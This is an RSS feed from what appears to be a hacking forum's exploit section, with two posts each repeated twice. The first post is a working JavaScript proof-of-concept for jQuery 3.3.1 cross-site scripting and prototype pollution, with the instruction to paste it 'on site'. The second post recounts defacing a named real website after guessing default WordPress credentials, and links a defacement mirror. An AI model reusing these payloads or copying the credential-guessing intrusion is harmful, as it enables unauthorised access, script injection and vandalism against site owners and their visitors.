<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[StucxTeam Forum - Exploit & POCs]]></title>
		<link>https://stucxteam.my/</link>
		<description><![CDATA[StucxTeam Forum - https://stucxteam.my]]></description>
		<pubDate>Sun, 02 Aug 2026 06:25:28 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[jQuery 3.3.1 - Prototype Pollution & XSS Exploit]]></title>
			<link>https://stucxteam.my/Thread-leak-jquery-3-3-1-prototype-pollution-xss-exploit</link>
			<pubDate>Sat, 14 Mar 2026 14:20:44 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://stucxteam.my/member.php?action=profile&uid=62">Ray Breslin</a>]]></dc:creator>
			<guid isPermaLink="false">https://stucxteam.my/Thread-leak-jquery-3-3-1-prototype-pollution-xss-exploit</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><div style="text-align: left;" class="mycode_align"># Exploit Title: jQuery Prototype Pollution &amp; XSS Exploit (CVE-2019-11358 &amp; CVE-2020-7656)</div>
<div style="text-align: left;" class="mycode_align"># Google Dork: N/A</div>
<div style="text-align: left;" class="mycode_align"># Date: 2025-02-13</div>
<div style="text-align: left;" class="mycode_align"># Exploit Author: xOryus</div>
<div style="text-align: left;" class="mycode_align"># Vendor Homepage: <a href="https://jquery.com" target="_blank" rel="noopener" class="mycode_url">https://jquery.com</a></div>
<div style="text-align: left;" class="mycode_align"># Software Link: <a href="https://code.jquery.com/jquery-3.3.1.min.js" target="_blank" rel="noopener" class="mycode_url">https://code.jquery.com/jquery-3.3.1.min.js</a></div>
<div style="text-align: left;" class="mycode_align"># Version: 3.3.1</div>
<div style="text-align: left;" class="mycode_align"># Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112</div>
<div style="text-align: left;" class="mycode_align"># CVE : CVE-2019-11358, CVE-2020-7656</div>
<div style="text-align: left;" class="mycode_align"># Category: WebApps</div>
<div style="text-align: left;" class="mycode_align"># Description:</div>
<div style="text-align: left;" class="mycode_align"># This exploit abuses two vulnerabilities in jQuery:</div>
<div style="text-align: left;" class="mycode_align"># - CVE-2020-7656: XSS via improper script handling</div>
<div style="text-align: left;" class="mycode_align"># - CVE-2019-11358: Prototype Pollution leading to XSS</div>
<div style="text-align: left;" class="mycode_align"># By injecting payloads into a vulnerable page using jQuery &lt;3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.</div>
<div style="text-align: left;" class="mycode_align">#</div>
<div style="text-align: left;" class="mycode_align"># Usage:</div>
<div style="text-align: left;" class="mycode_align"># 1. Load this script in a page that includes jQuery 3.3.1</div>
<div style="text-align: left;" class="mycode_align"># 2. Observe two XSS alerts via script injection and prototype pollution.</div>
<div style="text-align: left;" class="mycode_align"># PoC (Proof of Concept):</div>
<div style="text-align: left;" class="mycode_align"># ------------------------------------</div>
<div style="text-align: left;" class="mycode_align">/*</div>
<div style="text-align: left;" class="mycode_align">* Exploit for CVE-2020-7656 and CVE-2019-11358</div>
<div style="text-align: left;" class="mycode_align">* Injects malicious JavaScript into a vulnerable page using jQuery &lt;3.4.X</div>
<div style="text-align: left;" class="mycode_align">*/</div>
<div style="text-align: left;" class="mycode_align">COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)</div>
<div style="text-align: left;" class="mycode_align">// 1. Load vulnerable jQuery (version 3.3.1)</div>
<div style="text-align: left;" class="mycode_align">const script = document.createElement('script');</div>
<div style="text-align: left;" class="mycode_align">script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";</div>
<div style="text-align: left;" class="mycode_align">document.head.appendChild(script);</div>
<div style="text-align: left;" class="mycode_align">// 2. Function to execute after jQuery is loaded</div>
<div style="text-align: left;" class="mycode_align">script.onload = function() {</div>
<div style="text-align: left;" class="mycode_align">    console.log("[+] Vulnerable jQuery loaded!");</div>
<div style="text-align: left;" class="mycode_align">    // 3. Inject malicious content for XSS (CVE-2020-7656)</div>
<div style="text-align: left;" class="mycode_align">    const maliciousContent = "&lt;script&gt;alert('XSS via CVE-2020-7656: ' + document.domain)&lt;/script &gt;"; // Space after &lt;/script&gt;</div>
<div style="text-align: left;" class="mycode_align">    &#36;('body').append(maliciousContent);</div>
<div style="text-align: left;" class="mycode_align">    console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");</div>
<div style="text-align: left;" class="mycode_align">    // 4. Exploit Prototype Pollution (CVE-2019-11358)</div>
<div style="text-align: left;" class="mycode_align">    const defaultConfig = {</div>
<div style="text-align: left;" class="mycode_align">        "backLink": "&lt;a href='https://example.com'&gt;Go Back&lt;/a&gt;"</div>
<div style="text-align: left;" class="mycode_align">    };</div>
<div style="text-align: left;" class="mycode_align">    const maliciousParams = {</div>
<div style="text-align: left;" class="mycode_align">        "__proto__": {</div>
<div style="text-align: left;" class="mycode_align">            "backLink": "&lt;svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')&gt;"</div>
<div style="text-align: left;" class="mycode_align">        }</div>
<div style="text-align: left;" class="mycode_align">    };</div>
<div style="text-align: left;" class="mycode_align">    // 5. Merge objects using vulnerable &#36;.extend</div>
<div style="text-align: left;" class="mycode_align">    let config = &#36;.extend(true, defaultConfig, maliciousParams);</div>
<div style="text-align: left;" class="mycode_align">    console.log("[+] Prototype Pollution executed via &#36;.extend().");</div>
<div style="text-align: left;" class="mycode_align">    // 6. Create a container to inject malicious content</div>
<div style="text-align: left;" class="mycode_align">    const container = document.createElement('div');</div>
<div style="text-align: left;" class="mycode_align">    container.id = 'backLinkContainer';</div>
<div style="text-align: left;" class="mycode_align">    document.body.appendChild(container);</div>
<div style="text-align: left;" class="mycode_align">    // 7. Inject malicious content into the DOM</div>
<div style="text-align: left;" class="mycode_align">    &#36;('#backLinkContainer').html(config.backLink);</div>
<div style="text-align: left;" class="mycode_align">    console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");</div>
<div style="text-align: left;" class="mycode_align">};</div>
<div style="text-align: left;" class="mycode_align">// 8. Instruction message</div>
<div style="text-align: left;" class="mycode_align">console.log("</div>
[*]Script injected. Waiting for jQuery to load...");<br />
</div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><div style="text-align: left;" class="mycode_align"># Exploit Title: jQuery Prototype Pollution &amp; XSS Exploit (CVE-2019-11358 &amp; CVE-2020-7656)</div>
<div style="text-align: left;" class="mycode_align"># Google Dork: N/A</div>
<div style="text-align: left;" class="mycode_align"># Date: 2025-02-13</div>
<div style="text-align: left;" class="mycode_align"># Exploit Author: xOryus</div>
<div style="text-align: left;" class="mycode_align"># Vendor Homepage: <a href="https://jquery.com" target="_blank" rel="noopener" class="mycode_url">https://jquery.com</a></div>
<div style="text-align: left;" class="mycode_align"># Software Link: <a href="https://code.jquery.com/jquery-3.3.1.min.js" target="_blank" rel="noopener" class="mycode_url">https://code.jquery.com/jquery-3.3.1.min.js</a></div>
<div style="text-align: left;" class="mycode_align"># Version: 3.3.1</div>
<div style="text-align: left;" class="mycode_align"># Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112</div>
<div style="text-align: left;" class="mycode_align"># CVE : CVE-2019-11358, CVE-2020-7656</div>
<div style="text-align: left;" class="mycode_align"># Category: WebApps</div>
<div style="text-align: left;" class="mycode_align"># Description:</div>
<div style="text-align: left;" class="mycode_align"># This exploit abuses two vulnerabilities in jQuery:</div>
<div style="text-align: left;" class="mycode_align"># - CVE-2020-7656: XSS via improper script handling</div>
<div style="text-align: left;" class="mycode_align"># - CVE-2019-11358: Prototype Pollution leading to XSS</div>
<div style="text-align: left;" class="mycode_align"># By injecting payloads into a vulnerable page using jQuery &lt;3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.</div>
<div style="text-align: left;" class="mycode_align">#</div>
<div style="text-align: left;" class="mycode_align"># Usage:</div>
<div style="text-align: left;" class="mycode_align"># 1. Load this script in a page that includes jQuery 3.3.1</div>
<div style="text-align: left;" class="mycode_align"># 2. Observe two XSS alerts via script injection and prototype pollution.</div>
<div style="text-align: left;" class="mycode_align"># PoC (Proof of Concept):</div>
<div style="text-align: left;" class="mycode_align"># ------------------------------------</div>
<div style="text-align: left;" class="mycode_align">/*</div>
<div style="text-align: left;" class="mycode_align">* Exploit for CVE-2020-7656 and CVE-2019-11358</div>
<div style="text-align: left;" class="mycode_align">* Injects malicious JavaScript into a vulnerable page using jQuery &lt;3.4.X</div>
<div style="text-align: left;" class="mycode_align">*/</div>
<div style="text-align: left;" class="mycode_align">COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)</div>
<div style="text-align: left;" class="mycode_align">// 1. Load vulnerable jQuery (version 3.3.1)</div>
<div style="text-align: left;" class="mycode_align">const script = document.createElement('script');</div>
<div style="text-align: left;" class="mycode_align">script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";</div>
<div style="text-align: left;" class="mycode_align">document.head.appendChild(script);</div>
<div style="text-align: left;" class="mycode_align">// 2. Function to execute after jQuery is loaded</div>
<div style="text-align: left;" class="mycode_align">script.onload = function() {</div>
<div style="text-align: left;" class="mycode_align">    console.log("[+] Vulnerable jQuery loaded!");</div>
<div style="text-align: left;" class="mycode_align">    // 3. Inject malicious content for XSS (CVE-2020-7656)</div>
<div style="text-align: left;" class="mycode_align">    const maliciousContent = "&lt;script&gt;alert('XSS via CVE-2020-7656: ' + document.domain)&lt;/script &gt;"; // Space after &lt;/script&gt;</div>
<div style="text-align: left;" class="mycode_align">    &#36;('body').append(maliciousContent);</div>
<div style="text-align: left;" class="mycode_align">    console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");</div>
<div style="text-align: left;" class="mycode_align">    // 4. Exploit Prototype Pollution (CVE-2019-11358)</div>
<div style="text-align: left;" class="mycode_align">    const defaultConfig = {</div>
<div style="text-align: left;" class="mycode_align">        "backLink": "&lt;a href='https://example.com'&gt;Go Back&lt;/a&gt;"</div>
<div style="text-align: left;" class="mycode_align">    };</div>
<div style="text-align: left;" class="mycode_align">    const maliciousParams = {</div>
<div style="text-align: left;" class="mycode_align">        "__proto__": {</div>
<div style="text-align: left;" class="mycode_align">            "backLink": "&lt;svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')&gt;"</div>
<div style="text-align: left;" class="mycode_align">        }</div>
<div style="text-align: left;" class="mycode_align">    };</div>
<div style="text-align: left;" class="mycode_align">    // 5. Merge objects using vulnerable &#36;.extend</div>
<div style="text-align: left;" class="mycode_align">    let config = &#36;.extend(true, defaultConfig, maliciousParams);</div>
<div style="text-align: left;" class="mycode_align">    console.log("[+] Prototype Pollution executed via &#36;.extend().");</div>
<div style="text-align: left;" class="mycode_align">    // 6. Create a container to inject malicious content</div>
<div style="text-align: left;" class="mycode_align">    const container = document.createElement('div');</div>
<div style="text-align: left;" class="mycode_align">    container.id = 'backLinkContainer';</div>
<div style="text-align: left;" class="mycode_align">    document.body.appendChild(container);</div>
<div style="text-align: left;" class="mycode_align">    // 7. Inject malicious content into the DOM</div>
<div style="text-align: left;" class="mycode_align">    &#36;('#backLinkContainer').html(config.backLink);</div>
<div style="text-align: left;" class="mycode_align">    console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");</div>
<div style="text-align: left;" class="mycode_align">};</div>
<div style="text-align: left;" class="mycode_align">// 8. Instruction message</div>
<div style="text-align: left;" class="mycode_align">console.log("</div>
[*]Script injected. Waiting for jQuery to load...");<br />
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Weak WordPress Authentication Leading to Website Defacement]]></title>
			<link>https://stucxteam.my/Thread-leak-weak-wordpress-authentication-leading-to-website-defacement</link>
			<pubDate>Sat, 07 Mar 2026 17:09:12 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://stucxteam.my/member.php?action=profile&uid=13">Carlos1337</a>]]></dc:creator>
			<guid isPermaLink="false">https://stucxteam.my/Thread-leak-weak-wordpress-authentication-leading-to-website-defacement</guid>
			<description><![CDATA[Found a website vulnerability that allowed defacement.<br />
The issue has now been fixed by the admin.<br />
Sharing this for learning purposes.<br />
PoC:  <a href="https://www.zone-h.org/mirror/id/41495333" target="_blank" rel="noopener" class="mycode_url">https://www.zone-h.org/mirror/id/41495333</a><br />
web:  <a href="https://aysenscreation.com/" target="_blank" rel="noopener" class="mycode_url">https://aysenscreation.com/</a><br />
<br />
During basic recon, I noticed the site was using the default <span style="font-weight: bold;" class="mycode_b">WordPress</span> login page.  After testing several common/default credentials, the login was successful. This shows that the administrator had not changed the default or weak password.  With access to the admin dashboard, it was possible to modify the website content, which allowed a defacement to demonstrate the impact.  The vulnerability has now been fixed by the administrator.]]></description>
			<content:encoded><![CDATA[Found a website vulnerability that allowed defacement.<br />
The issue has now been fixed by the admin.<br />
Sharing this for learning purposes.<br />
PoC:  <a href="https://www.zone-h.org/mirror/id/41495333" target="_blank" rel="noopener" class="mycode_url">https://www.zone-h.org/mirror/id/41495333</a><br />
web:  <a href="https://aysenscreation.com/" target="_blank" rel="noopener" class="mycode_url">https://aysenscreation.com/</a><br />
<br />
During basic recon, I noticed the site was using the default <span style="font-weight: bold;" class="mycode_b">WordPress</span> login page.  After testing several common/default credentials, the login was successful. This shows that the administrator had not changed the default or weak password.  With access to the admin dashboard, it was possible to modify the website content, which allowed a defacement to demonstrate the impact.  The vulnerability has now been fixed by the administrator.]]></content:encoded>
		</item>
	</channel>
</rss>